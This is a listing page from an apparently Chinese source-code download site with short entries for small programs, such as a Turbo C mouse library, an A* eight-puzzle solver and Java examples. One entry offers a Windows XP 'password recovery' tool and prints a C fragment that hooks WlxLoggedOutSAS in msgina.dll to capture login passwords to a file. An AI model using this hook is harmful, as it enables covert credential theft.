-
mtc 1.0b(支持鼠标,turbo2.0)
资源描述本软件使你的TurboC2.0支持鼠标 ,很古老的代码,可以学习下。
- 2022-01-26 03:08:56下载
- 积分:1
-
haldas dadljasd jaslkdjsad kjsad
kkj qwelqwleqbwe ;
- 2022-04-15 09:34:30下载
- 积分:1
-
with A* algorithm JiuGongTu problem and the optimal solution is given, including...
用A*算法实现九宫问题,并给出最优解,其中包括每一步的执行路径-with A* algorithm JiuGongTu problem and the optimal solution is given, including each step of the implementation of the road
- 2023-08-01 02:10:02下载
- 积分:1
-
动态分配内存的代码
动态分配内存的代码-dynamic memory allocation code
- 2023-08-04 22:45:06下载
- 积分:1
-
mir source code
mir source code for new user to study
i hope it is can be used to you
and all one
c++ source code
mir source code for new user to study
i hope it is can be used to you
and all one
c++ source code
- 2022-03-05 02:09:49下载
- 积分:1
-
可实验0.5KHZ到10KHZ的简单测频,并由数码管显示出来!
可实验0.5KHZ到10KHZ的简单测频,并由数码管显示出来!-Experimental 0.5KHZ can be simple to 10KHz frequency measurement by digital tube display!
- 2022-08-14 12:47:45下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
征途真彩客户端源代码
征途真彩客户端源代码,内测1.0版本,需要最早的内侧客户端-Journey of true color client source
code, closed beta version 1.0, the first inside the client needs
- 2023-08-12 03:00:04下载
- 积分:1
-
Scrollable JTable codes in Java 2
Scrollable JTable codes in Java 2
- 2022-03-26 18:25:13下载
- 积分:1
-
Example for HTTPSession in Java
提供一种方法,可以跨多个页面请求或访问网站来标识用户,并存储有关该用户的信息。
- 2022-03-18 05:19:36下载
- 积分:1